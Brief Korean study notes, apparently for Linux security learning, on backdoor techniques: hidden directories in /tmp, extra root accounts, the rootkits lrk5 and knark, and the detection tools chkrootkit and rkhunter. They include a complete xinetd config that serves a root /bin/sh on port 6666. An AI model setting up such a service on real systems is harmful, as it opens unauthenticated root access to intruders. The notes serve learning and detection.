백도어 설치위해 주로 사용되는 위치 /tmp or /var/tmp
공백이나 . / 등의 특수문자로 만든 디렉토리나 파일
xinetd 데몬을 이용하여 셸을 실행시키는 서비스 생성하여 특정 포트로 연결
# cat /etc/cat/xinetd.d/hacker service hacker { disable = no flags = REUSE socket_type = stream wait = no user = root server = /bin/sh server_args = -i } # cat /etc/services hacker 6666/tcp hacker 6666/udp
루트권한가진 계정 추가
rootkit (공격도구 패키지) #
lrk5
kernel backdoor #
knark - 리눅스커널 2.2에 설치
백도어나 루트킷 등 보안 체크 프로그램 #
chkrootkit
rkhunter